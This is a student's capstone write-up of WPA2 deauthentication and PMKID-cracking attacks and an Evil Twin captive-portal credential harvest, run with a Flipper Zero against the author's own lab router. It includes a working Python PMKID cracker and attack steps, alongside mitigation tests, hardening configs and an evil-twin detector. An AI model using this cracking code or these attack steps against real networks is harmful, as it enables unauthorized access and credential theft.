Flipper Zero Wi-Fi Attack Analysis
WPA2 deauth + Evil Twin attacks with a $200 pocket device
01. Overview
This was my senior capstone project for the Bachelor of Computer Information Systems — Cybersecurity at the University of Akron. The goal was to prove, hands-on, that WPA2-Personal networks can be compromised with consumer hardware costing under $250 — no specialized lab equipment or Kali Linux setup required — and then verify that the recommended mitigations actually work against real attack tools.
Two independent attack vectors were demonstrated and compared: a cryptographic attack that captures and cracks the WPA2 4-way handshake, and a social engineering attack that bypasses encryption entirely by tricking users into handing over credentials through a spoofed captive portal. Both run on the same Flipper Zero with an ESP32 Wi-Fi Dev Board.
02. Lab Setup
| Component | Details |
|---|---|
| Attack device | Flipper Zero — Momentum firmware MNTM-011 |
| Wi-Fi module | ESP32 Wi-Fi Dev Board — Marauder firmware v1.10.2 (flashed via FzeeFlasher) |
| Target router | Netgear Nighthawk AX1800 R6700AX (isolated from primary network) |
| Target networks | 2.4 GHz: CM_Link / The_Nap · 5 GHz: CM_Link-5G |
| Cracking VM | Parrot Security OS (Security Edition) on Proxmox VE 9.1 |
| GPU passthrough | NVIDIA GeForce GTX 1650 via IOMMU/VFIO, ~185 kH/s on hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL) |
| File transfer | qFlipper v1.3.3 + SCP to VM |
| Client devices | Researcher-owned iPhone and Windows desktop |
03. Attack Vector 1 — Deauthentication & Handshake Crack
How the attack works
On WPA2 networks that do not enforce 802.11w Protected Management Frames, the 802.11 deauthentication frame is unauthenticated: any device within radio range can forge one in the access point's name, and the client obeys it, disconnects, and (as almost every client does) reconnects automatically. That reconnection replays the WPA2 4-way handshake. The EAPOL frames, or the PMKID the AP includes in the first message, contain enough material to test passphrase guesses offline, so the attacker never has to interact with the network's authentication in real time; after the capture the only cost is compute.
Execution
On the Flipper Zero, the ESP32 Marauder app scanned for access points (scan ap), targeted CM_Link, then ran sniff pmkid with deauth enabled. Within seconds the display showed DEAUTH TX: TRUE and sniffpmkid_0.pcap was written to the SD card. The file was pulled via qFlipper and transferred to the Parrot OS VM over SCP.

On the VM, hcxpcapngtool converted the pcap to hashcat mode 22000. A wordlist attack with rockyou.txt ran at 167 H/s on the original CPU-only VirtualBox VM (~21 hours estimated for the full list) and was abandoned; after migrating to Proxmox with GPU passthrough the rate jumped to 185 kH/s. The test password 19002521 (8-digit numeric) was not in rockyou.txt, but a brute-force mask attack (?d?d?d?d?d?d?d?d, a 10^8 keyspace, about nine minutes worst case at that rate) recovered it in 1 minute 45 seconds.
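The arithmetic hashcat performs on each guess, written out as an added example (this is not code from the capstone project; it only uses the Python standard library). It parses a mode 22000 PMKID line in the format hcxpcapngtool writes, derives the PMK and PMKID for a candidate passphrase, and runs a wordlist pass and a mask pass against a capture built from the lab's test password. The SSID is the lab's CM_Link; the MAC addresses are constructed, and `make_22000_line` exists only to fabricate a test fixture from a known passphrase.

```python
"""PMKID attack arithmetic: added example, not code from the capstone write-up.

A hashcat mode 22000 line of type 01 (what hcxpcapngtool writes for a captured
PMKID) is  WPA*01*<PMKID>*<MAC_AP>*<MAC_STA>*<ESSID hex>***  and the check is:
    PMK   = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes)
    PMKID = HMAC-SHA1(PMK, b"PMK Name" + MAC_AP + MAC_STA)[:16]
The ESSID below is the lab's; the MAC addresses are constructed.
"""
import hashlib
import hmac
import itertools
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional, Tuple

MASK_CHARSETS = {
    "d": "0123456789",
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
}


@dataclass(frozen=True)
class Pmkid22000:
    pmkid: bytes
    mac_ap: bytes
    mac_sta: bytes
    essid: bytes


def parse_22000(line: str) -> Pmkid22000:
    """Parse one type-01 (PMKID) line; EAPOL lines (type 02) are rejected."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] != "01":
        raise ValueError("not a hashcat 22000 PMKID line")
    return Pmkid22000(bytes.fromhex(f[2]), bytes.fromhex(f[3]),
                      bytes.fromhex(f[4]), bytes.fromhex(f[5]))


def pmkid_for(passphrase: str, h: Pmkid22000) -> bytes:
    """The per-guess work hashcat does: 4096-round PBKDF2, then one HMAC."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), h.essid, 4096, 32)
    return hmac.new(pmk, b"PMK Name" + h.mac_ap + h.mac_sta, "sha1").digest()[:16]


def make_22000_line(passphrase: str, essid: str, mac_ap: str, mac_sta: str) -> str:
    """Fabricate a capture line from a known passphrase (test fixture only;
    a real line comes out of hcxpcapngtool). MACs are 12 hex chars, no colons."""
    h = Pmkid22000(b"", bytes.fromhex(mac_ap), bytes.fromhex(mac_sta), essid.encode())
    return f"WPA*01*{pmkid_for(passphrase, h).hex()}*{mac_ap}*{mac_sta}*{h.essid.hex()}***"


def _mask_slots(mask: str) -> list:
    """Expand a hashcat-style mask into per-position alphabets: ?d ?l ?u are
    placeholders, every other character is a literal."""
    slots, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in MASK_CHARSETS:
            slots.append(MASK_CHARSETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    return slots


def keyspace(mask: str) -> int:
    n = 1
    for s in _mask_slots(mask):
        n *= len(s)
    return n


def mask_candidates(mask: str) -> Iterator[str]:
    for combo in itertools.product(*_mask_slots(mask)):
        yield "".join(combo)


def estimate_seconds(mask: str, hashes_per_second: float) -> float:
    """Worst-case run time of a mask at a measured hashcat rate."""
    return keyspace(mask) / hashes_per_second


def crack(h: Pmkid22000, candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Return (passphrase, guesses tried) or (None, guesses tried)."""
    tried = 0
    for cand in candidates:
        tried += 1
        if hmac.compare_digest(pmkid_for(cand, h), h.pmkid):
            return cand, tried
    return None, tried


if __name__ == "__main__":
    # Constructed capture for the lab's test password; MACs are made up.
    line = make_22000_line("19002521", "CM_Link", "020000000001", "020000000002")
    h = parse_22000(line)
    print("short wordlist:", crack(h, ["password", "sunshine", "Sunshine@Home123"]))
    print("8-digit mask, worst case at 185 kH/s: %.0f s"
          % estimate_seconds("?d?d?d?d?d?d?d?d", 185_000))
    # Pure Python manages only a few hundred PBKDF2 runs per second, so the
    # demo pins the first five digits and brute-forces the last three.
    print("mask 19002?d?d?d:", crack(h, mask_candidates("19002?d?d?d")))
```

The 4096-round PBKDF2 is the whole cost of the attack; it is also why the `?d?d?d?d?d?d?d?d` keyspace of 10^8 is nine minutes on the GTX 1650 and why `keyspace()` overflows hashcat's 64-bit counter for a 16-character mixed-class mask.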
Mitigations tested
- → WPA3-Personal: Switched the router to WPA3-Personal (SAE) and repeated the capture. hcxpcapngtool returned "no hashes written to hash files": nothing crackable was captured. Two properties of WPA3 combine here. SAE (Dragonfly) is a password-authenticated key exchange with forward secrecy, so a recorded exchange gives an attacker no way to test guesses offline; every guess costs a live round trip with the AP. And WPA3 makes 802.11w Protected Management Frames mandatory, so the forged deauth that kicked the client off in the first place is simply discarded.
- → Strong passphrase: Changed the password to Sunshine@Home123 (16 characters: mixed case, a symbol and digits). The mask attack immediately failed with hashcat's integer overflow error on the keyspace, i.e. brute force is computationally infeasible. However, the wordlist attack recovered it in ~2 hours because it appeared in rockyou.txt. Lesson: length stops brute force, but only uniqueness stops dictionary attacks, and word-plus-symbol-plus-digits is exactly the pattern wordlists and their rules cover. You need both.
- → SSID broadcast disabled: Hiding the SSID removed CM_Link / The_Nap from the Marauder AP scan list entirely. That defeats the scan-by-name workflow used here but is obscurity rather than a control: the AP still beacons under its BSSID, the SSID is sent in the clear in every association request, and deauth and PMKID capture target the BSSID, not the name. It also inconveniences networks that frequently onboard new devices.
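The same change expressed as a hostapd configuration so the weak and hardened settings can be diffed line by line: an added example, not the Netgear UI used in the lab. The option names are hostapd's; the interface, channel and placeholder passphrase are assumptions.

```ini
# --- Setting the lab started with: WPA2-Personal, management frames unprotected ---
interface=wlan0
ssid=CM_Link
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=19002521
# 0 = PMF off: a forged deauth is obeyed, and the 4-way handshake / PMKID
# that follows can be captured and cracked offline
ieee80211w=0

# --- WPA3-Personal, strict mode (the setting that stopped the capture) ---
interface=wlan0
ssid=CM_Link
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
# placeholder: SAE removes offline cracking, not online guessing, so the
# passphrase still has to be long and unique
sae_password=CHANGE-ME-long-unique-passphrase
# 2 = PMF required: forged deauth/disassoc frames are discarded
ieee80211w=2

# --- Transition mode, for the Future Directions comparison ---
# wpa_key_mgmt=WPA-PSK SAE
# ieee80211w=1
# sae_require_mfp=1
# wpa_passphrase=...
# sae_password=...
# WPA2-PSK clients are still served and still perform a capturable 4-way
# handshake keyed by wpa_passphrase; if sae_password is left unset hostapd
# reuses wpa_passphrase for SAE, and cracking a WPA2 client's handshake then
# hands over the WPA3 passphrase as well.
```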
04. Attack Vector 2 — Evil Twin Captive Portal
How the attack works
Instead of breaking encryption, the Evil Twin attack exploits the trust users place in an SSID. The Flipper broadcasts a rogue open access point with the same name as a nearby network. When a victim joins, the device runs its usual captive-portal check (a request to a known URL, as iOS does against captive.apple.com); the ESP32 answers every DNS query with its own address and serves whatever HTML page the attacker loaded onto the Flipper, so the browser opens a convincing login page for Apple, Starbucks, or a router admin panel. Whatever the victim types into the form is posted back to the ESP32 and printed on the Flipper Zero display.
Execution
Spoofed HTML login pages (Apple, Starbucks, TP-Link) were sourced from the open-source FlipperZeroEuropeanPortals repository and uploaded to SD_Card/apps_data/evil_portal/html/ via qFlipper. The AP name was set to The_Nap to mirror the real network.

On the researcher's iPhone, playing the victim, the rogue AP appeared in the Wi-Fi list as an open network sitting alongside the real password-protected one. Connecting triggered the captive portal immediately. After FakeEmail@gmail.com / Test123 was entered on the Apple ID page, the Flipper display showed the captured credentials at once.
Mitigations observed
- → Duplicate SSID awareness: With the rogue AP named The_Nap, Windows listed two entries side by side: one with a lock icon (real), one without (rogue). A security-aware user recognises that a network which previously required a password should never appear as open.
- → Browser security warnings: Chrome displayed "Not Secure" next to 172.0.0.1, the rogue AP's own address, in the address bar, and clicking that indicator produced Chrome's explicit warning against entering sensitive information on the site. A user who reads and acts on either cue is protected. The address is the stronger tell: a legitimate captive portal is also served over plain HTTP, but an Apple ID login page never lives at a bare IP address.
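The "duplicate SSID" observation turned into detection logic, as an added example (not part of the capstone or any of the tools it used): a small triage pass over a Wi-Fi scan that flags an open AP advertising an SSID also served with encryption, a BSSID that has never served a baselined SSID, and a security downgrade against the baseline. The third rule matters for the edge case where the real router is out of range and only the rogue is visible, so the side-by-side comparison cannot fire. The scan lines and baseline are constructed; all MAC addresses are made-up locally administered ones.

```python
"""Evil-twin triage over a Wi-Fi scan: added example, not part of the write-up.

Input is the table any scanner produces (Marauder scanap, iw dev wlan0 scan,
netsh wlan show networks mode=bssid) reduced to SSID, BSSID, channel and
security. The baseline is what a homelab WIDS would persist: for each SSID you
own, the security it should advertise and the BSSIDs allowed to serve it.
All MAC addresses are constructed (locally administered 02:... range).
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Ordering used for downgrade checks; anything not listed ranks lowest.
STRENGTH = {"OPEN": 0, "WEP": 1, "WPA-PSK": 2, "WPA2-PSK": 3, "WPA3-SAE": 4}


@dataclass(frozen=True)
class Bss:
    ssid: str
    bssid: str
    channel: int
    security: str


@dataclass(frozen=True)
class Finding:
    bss: Bss
    reasons: Tuple[str, ...]


def parse_scan(text: str) -> List[Bss]:
    """One 'ssid,bssid,channel,security' record per line; '#' starts a comment."""
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ssid, bssid, ch, sec = (p.strip() for p in line.split(","))
        out.append(Bss(ssid, bssid.lower(), int(ch), sec.upper()))
    return out


def find_evil_twins(scan: List[Bss],
                    baseline: Dict[str, Tuple[str, Set[str]]]) -> List[Finding]:
    by_ssid: Dict[str, List[Bss]] = defaultdict(list)
    for b in scan:
        by_ssid[b.ssid].append(b)
    reasons: Dict[Bss, List[str]] = defaultdict(list)
    for ssid, bsses in by_ssid.items():
        secured = any(b.security != "OPEN" for b in bsses)
        for b in bsses:
            # Rule 1: the side-by-side view Windows showed: same name, no lock.
            if b.security == "OPEN" and secured:
                reasons[b].append("open AP shares its SSID with an encrypted AP in this scan")
            if ssid in baseline:
                want_sec, want_bssids = baseline[ssid]
                # Rule 2: a BSSID that has never served this SSID.
                if b.bssid not in want_bssids:
                    reasons[b].append("BSSID not in the baseline for this SSID")
                # Rule 3: weaker than baselined; catches the rogue even when the
                # real AP is out of range and rule 1 cannot fire.
                if STRENGTH.get(b.security, 0) < STRENGTH.get(want_sec, 0):
                    reasons[b].append(f"security downgraded from {want_sec} to {b.security}")
    return [Finding(b, tuple(r)) for b, r in reasons.items()]


SAMPLE_SCAN = """
# ssid,bssid,channel,security   (constructed scan of the lab environment)
The_Nap,02:00:00:00:00:01,6,WPA2-PSK
The_Nap,02:00:00:00:00:10,1,OPEN          # ESP32 evil portal
CM_Link,02:00:00:00:00:02,6,WPA2-PSK
CM_Link-5G,02:00:00:00:00:03,36,WPA2-PSK
CoffeeShop_Guest,02:00:00:00:00:20,11,OPEN # an ordinary open hotspot, no twin
"""

BASELINE = {
    "The_Nap": ("WPA2-PSK", {"02:00:00:00:00:01"}),
    "CM_Link": ("WPA2-PSK", {"02:00:00:00:00:02"}),
    "CM_Link-5G": ("WPA2-PSK", {"02:00:00:00:00:03"}),
}

if __name__ == "__main__":
    for f in find_evil_twins(parse_scan(SAMPLE_SCAN), BASELINE):
        print(f"{f.bss.ssid} {f.bss.bssid} ch{f.bss.channel} {f.bss.security}")
        for r in f.reasons:
            print("   -", r)
```

Run against the sample, only the open The_Nap on channel 1 is reported, with all three reasons; the real The_Nap and the unrelated open hotspot produce nothing. A rogue that also clones the real BSSID still trips rules 1 and 3, which is why the security field, not just the MAC, belongs in the baseline.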
05. Results Comparison
| Metric | Deauth / Handshake | Evil Twin Portal |
|---|---|---|
| Setup time | ~5 min (scan, select, capture, transfer) | ~3 min (upload HTML, set AP name) |
| Technical barrier | Medium — requires VM + Hashcat knowledge | Low — point and click on Flipper |
| Password required | No — captures hash for offline cracking | No — social engineering bypass |
| Success rate | High for weak/short passwords; blocked by WPA3 | High against unaware users; reduced by browser warnings |
| Primary mitigation | WPA3-Personal eliminates the attack path entirely | User awareness + verifying the URL / SSID lock icon |
06. Lessons Learned
- → WPA3-Personal is the only tested mitigation that fully closes the attack path: mandatory Protected Management Frames stop the forged deauth, and SAE leaves nothing in the capture to crack offline. A strong password is not a substitute; it only raises the cost of cracking a handshake the attacker still gets to keep.
- → Password length stops brute-force but not dictionary attacks. A passphrase that appears in rockyou.txt (like Sunshine@Home123) falls in a single pass of the list regardless of its length.
- → The Evil Twin attack has nothing to do with encryption strength; it bypasses it entirely, and WPA3 on the real network changes nothing because the victim never talks to the real network. The reliable defenses sit on the client and the user: no auto-join for open networks, SSID awareness (a network that used to need a password never shows up open), and refusing to type credentials into a page served over plain HTTP from a bare IP address.
- → GPU acceleration is the practical dividing line for cracking. 167 H/s on CPU versus 185 kH/s on a GTX 1650 is a ~1,100× difference: for the 8-digit mask, roughly a week worst case on the CPU versus nine minutes on the GPU.
- → The ESP32's 2.4 GHz-only radio means a client that associates exclusively on 5 GHz can neither be deauthenticated nor observed by Marauder. Dual-band networks with 5 GHz-preferred clients are therefore harder to target, with one caveat: if the 2.4 GHz and 5 GHz SSIDs share a passphrase, a clientless PMKID capture from the 2.4 GHz AP still yields the credential for both.
07. Future Directions
The natural extension is evaluating WPA3 transition mode versus strict mode across router vendors. Transition mode still serves WPA2-PSK clients, so their 4-way handshake remains capturable; what needs measuring is whether a vendor's configuration lets that handshake give away the same passphrase the SAE clients use. Comparing PMKID-only (clientless) capture against traditional EAPOL handshake capture would also be worth quantifying across hardware. Longer term, flipping to the defender's perspective and building a wireless intrusion detection layer for the homelab (alerting on duplicate SSIDs with mismatched security, unknown BSSIDs, and deauth floods) would complement these offensive findings directly.